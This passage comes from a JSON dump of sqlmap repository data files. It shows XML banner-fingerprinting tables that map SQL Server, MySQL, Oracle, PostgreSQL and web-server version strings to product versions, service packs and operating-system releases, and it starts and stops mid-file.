</signature>\n        <signature>\n            <version>\n                8.00.762\n            </version>\n            <servicepack>\n                3+Q814032\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.760\n            </version>\n            <servicepack>\n                3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.743\n            </version>\n            <servicepack>\n                2+Q818406\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.741\n            </version>\n            <servicepack>\n                2+Q818096\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.736\n            </version>\n            <servicepack>\n                2+Q816937\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.735\n            </version>\n            <servicepack>\n                2+Q814889\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.733\n            </version>\n            <servicepack>\n                2+Q813759\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.730\n            </version>\n            <servicepack>\n                2+Q813769\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.728\n            </version>\n            <servicepack>\n                2+Q814460\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.725\n            </version>\n            <servicepack>\n                2+Q812995\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.723\n            </version>\n            <servicepack>\n                2+Q812798\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.721\n            </version>\n            <servicepack>\n                2+Q812250\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.718\n            </version>\n            <servicepack>\n                2+Q811703\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.715\n            </version>\n            <servicepack>\n                2+Q810688\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.714\n            </version>\n            <servicepack>\n                2+Q811478\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.713\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.710\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.705\n            </version>\n            <servicepack>\n                2+Q810920\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.703\n            </version>\n            <servicepack>\n                2+Q810526\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.702\n            </version>\n            <servicepack>\n                2+Q328551\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.701\n            </version>\n            <servicepack>\n                2+Q810026\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.700\n            </version>\n            <servicepack>\n                2+Q810072\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.696\n            </version>\n            <servicepack>\n                2+Q810052\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.695\n            </version>\n            <servicepack>\n                2+Q331885\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.693\n            </version>\n            <servicepack>\n                2+Q330212\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.689\n            </version>\n            <servicepack>\n                2+Q329499\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.688\n            </version>\n            <servicepack>\n                2+Q329487\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.686\n            </version>\n            <servicepack>\n                2+Q316333\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.682\n            </version>\n            <servicepack>\n                3+Q319851\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.679\n            </version>\n            <servicepack>\n                2+Q316333\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.678\n            </version>\n            <servicepack>\n                2+Q328354\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.667\n            </version>\n            <servicepack>\n                2+8\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.665\n            </version>\n            <servicepack>\n                2+8\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.661\n            </version>\n            <servicepack>\n                2+Q326999\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.655\n            </version>\n            <servicepack>\n                2+7\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.652\n            </version>\n            <servicepack>\n                2+Q810010?\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.650\n            </version>\n            <servicepack>\n                2+Q322853\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.644\n            </version>\n            <servicepack>\n                2+Q324186\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.608\n            </version>\n            <servicepack>\n                2+Q319507\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.604\n            </version>\n            <servicepack>\n                2+3\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.594\n            </version>\n            <servicepack>\n                2+Q319477\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.578\n            </version>\n            <servicepack>\n                2+Q317979\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.561\n            </version>\n            <servicepack>\n                2+1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.558\n            </version>\n            <servicepack>\n                2+Q314003\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.552\n            </version>\n            <servicepack>\n                2+Q313002\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.534\n            </version>\n            <servicepack>\n                2.01\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.532\n            </version>\n            <servicepack>\n                2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.475\n            </version>\n            <servicepack>\n                1+1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.474\n            </version>\n            <servicepack>\n                1+Q315395\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.473\n            </version>\n            <servicepack>\n                1+Q314003\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.471\n            </version>\n            <servicepack>\n                1+Q313302\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.469\n            </version>\n            <servicepack>\n                1+Q313005\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.452\n            </version>\n            <servicepack>\n                1+Q308547\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.444\n            </version>\n            <servicepack>\n                1+Q307540\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.443\n            </version>\n            <servicepack>\n                1+Q307538\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.428\n            </version>\n            <servicepack>\n                1+Q304850\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.384\n            </version>\n            <servicepack>\n                1\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.287\n            </version>\n            <servicepack>\n                0+Q297209\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.251\n            </version>\n            <servicepack>\n                0+Q300194\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.250\n            </version>\n            <servicepack>\n                0+Q291683\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.249\n            </version>\n            <servicepack>\n                0+Q288122\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.239\n            </version>\n            <servicepack>\n                0+Q285290\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.233\n            </version>\n            <servicepack>\n                0+Q282416\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.231\n            </version>\n            <servicepack>\n                0+Q282279\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.226\n            </version>\n            <servicepack>\n                0+Q278239\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.225\n            </version>\n            <servicepack>\n                0+Q281663\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.223\n            </version>\n            <servicepack>\n                0+Q280380\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.222\n            </version>\n            <servicepack>\n                0+Q281769\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.218\n            </version>\n            <servicepack>\n                0+Q279183\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.217\n            </version>\n            <servicepack>\n                0+Q279293\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.211\n            </version>\n            <servicepack>\n                0+Q276329\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.210\n            </version>\n            <servicepack>\n                0+Q275900\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.205\n            </version>\n            <servicepack>\n                0+Q274330\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.204\n            </version>\n            <servicepack>\n                0+Q274329\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.194\n            </version>\n            <servicepack>\n                0\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.190\n            </version>\n            <servicepack>\n                Gold, no\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.100\n            </version>\n            <servicepack>\n                Beta 2\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.078\n            </version>\n            <servicepack>\n                EAP5\n            </servicepack>\n        </signature>\n        <signature>\n            <version>\n                8.00.047\n            </version>\n            <servicepack>\n                EAP4\n            </servicepack>\n        </signature>\n    </signatures>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/mysql.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!--\n     References:\n     * https://en.wikipedia.org/wiki/Debian_version_history\n-->\n\n<root>\n    <regexp value=\"^([\\d\\.\\-]+)[\\-\\_\\ ].*\">\n        <info dbms_version=\"1\"/>\n    </regexp>\n\n    <!-- Windows -->\n    <regexp value=\"^([\\d\\.\\-]+)[\\-\\_\\ ].*nt$\">\n        <info dbms_version=\"1\" type=\"Windows\"/>\n    </regexp>\n\n    <!-- Debian -->\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+potato\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"2.1\" codename=\"potato\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+woody\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"3.0\" codename=\"woody\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+sarge\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"3.1\" codename=\"sarge\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+etch\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"4.0\" codename=\"etch\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+lenny\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"5.0\" codename=\"lenny\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+squeeze\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"6.0\" codename=\"squeeze\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+wheezy\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"7\" codename=\"wheezy\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+jessie\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"8\" codename=\"jessie\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+stretch\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"9\" codename=\"stretch\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+buster\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"10\" codename=\"buster\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+bullseye\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"11\" codename=\"bullseye\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+bookworm\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"12\" codename=\"bookworm\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+trixie\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" release=\"13\" codename=\"trixie\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+(sid|unstable)\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" codename=\"unstable\"/>\n    </regexp>\n\n    <regexp value=\"^([\\d\\.]+)[\\-\\_]Debian[\\-\\_][\\d\\.]+testing\">\n        <info dbms_version=\"1\" type=\"Linux\" distrib=\"Debian\" codename=\"testing\"/>\n    </regexp>\n\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/oracle.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <regexp value=\"^Oracle\\s+.*Release\\s+([\\d\\.]+)\\s+\">\n        <info dbms_version=\"1\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/postgresql.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <regexp value=\"PostgreSQL\\s+([\\w\\.]+)\">\n        <info dbms_version=\"1\"/>\n    </regexp>\n\n    <!-- Windows -->\n    <regexp value=\"Visual C\\+\\+\">\n        <info type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"mingw([\\d]+)\">\n        <info type=\"Windows\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/server.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!--\n     References:\n     * https://en.wikipedia.org/wiki/Internet_Information_Services\n     * https://distrowatch.com\n-->\n\n<root>\n    <!-- Microsoft IIS -->\n\n    <regexp value=\"Microsoft-IIS/(10\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2019|2016|10\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(8\\.5)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2012 R2|8.1\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(8\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2012|8\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(7\\.5)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2008 R2|7\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(7\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2008|Vista\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(6\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2003|XP\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(5\\.2)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2003\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(5\\.1)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"XP\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(5\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"2000\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(4\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(3\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <regexp value=\"Microsoft-IIS/(2\\.0)\">\n        <info technology=\"Microsoft IIS\" tech_version=\"1\" type=\"Windows\" distrib=\"NT 4.0\"/>\n    </regexp>\n\n    <!-- Apache -->\n\n    <regexp value=\"Apache$\">\n        <info technology=\"Apache\"/>\n    </regexp>\n\n    <regexp value=\"Apache/([\\w\\.]+)\">\n        <info technology=\"Apache\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Apache[\\-\\_\\ ]AdvancedExtranetServer/([\\w\\.]+)\">\n        <info technology=\"Apache\" tech_version=\"1\"/>\n    </regexp>\n\n    <!-- Apache: CentOS -->\n\n    <regexp value=\"Apache/2\\.0\\.46 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"3\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.52 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"4\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"5\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"6\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"7\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.37 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"8\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.48 \\(CentOS\\)\">\n        <info type=\"Linux\" distrib=\"CentOS\" release=\"9\"/>\n    </regexp>\n\n    <!-- Apache: Debian -->\n\n    <regexp value=\"Apache/1\\.0\\.5 \\(Unix\\) Debian/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"1.1\" codename=\"buzz\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.1\\.1 \\(Unix\\) Debian/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"1.2\" codename=\"rex\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.1\\.3 \\(Unix\\) Debian/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"1.3\" codename=\"bo\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.0 \\(Unix\\) Debian/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"2.0\" codename=\"hamm\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.3 \\(Unix\\) Debian/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"2.1\" codename=\"slink\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.9 \\(Unix\\) Debian\\/GNU\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"2.2\" codename=\"potato\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.26 \\(Debian GNU\\/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"3.0\" codename=\"woody\"/>\n    </regexp>\n\n    <regexp value=\"Apache/1\\.3\\.33 \\(Debian GNU\\/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"3.1\" codename=\"sarge\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.54 \\(Debian GNU\\/Linux\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"3.1\" codename=\"sarge\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"4\" codename=\"etch\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.9 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"5\" codename=\"lenny\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.16 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"6\" codename=\"squeeze\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.22 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"7\" codename=\"wheezy\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.10 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"8\" codename=\"jessie\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.25 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"9\" codename=\"stretch\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.38 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"10\" codename=\"buster\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.48 \\(Debian\\)\">\n        <info type=\"Linux\" distrib=\"Debian\" release=\"11\" codename=\"bullseye\"/>\n    </regexp>\n\n    <!-- Apache: Fedora -->\n\n    <regexp value=\"Apache/2\\.0\\.47 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"1\" codename=\"Yarrow\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.50 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"1\" codename=\"Yarrow\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.49 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"2\" codename=\"Tettnang\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.51 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"2\" codename=\"Tettnang\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.52 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"3\" codename=\"Heidelberg\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.53 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"3\" codename=\"Heidelberg\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.54 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"4\" codename=\"Stentz\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.0 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"5\" codename=\"Bordeaux\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.2 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"5\" codename=\"Bordeaux\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.3 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"6\" codename=\"Zod\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.4 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"7\" codename=\"Moonshine\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.6 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"6|7\" codename=\"Zod|Moonshine\" updated=\"True\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.6 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"8\" codename=\"Werewolf\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.8 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"9\" codename=\"Sulphur\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.10 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"10\" codename=\"Cambridge\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.11 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"11\" codename=\"Leonidas\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.13 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"12\" codename=\"Constantine\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.15 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"13\" codename=\"Goddard\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.16 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"14\" codename=\"Laughlin\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.17 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"15\" codename=\"Lovelock\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.21 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"16\" codename=\"Verne\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.2\\.22 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"17\" codename=\"Beefy\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.3 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"18\" codename=\"Spherical\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.4 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"19\" codename=\"Schrodingers\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.6 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"20\" codename=\"Heisenbug\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.10 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"21\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.12 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"22\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.16 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"23\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.18 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"24\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.23 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"25\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.25 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"26\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.28 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"27\"/>\n    </regexp>\n\n\n    <regexp value=\"Apache/2\\.4\\.33 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"28\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.34 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"29\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.39 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"30\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.41 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"31\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.43 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"32\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.46 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"33|34\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.4\\.51 \\(Fedora\\)\">\n        <info type=\"Linux\" distrib=\"Fedora\" release=\"35\"/>\n    </regexp>\n\n    <!-- Apache: FreeBSD -->\n\n    <regexp value=\"Apache/2\\.0\\.16 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.4\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.28 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.5\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.36 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.6\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.43 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.7|5.0\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.44 \\(FreeBSD\\)\">\n        <info type=\"FreeBSD\" release=\"4.8\"/>\n    </regexp>\n\n    <regexp value=\"Apache/2\\.0\\.47 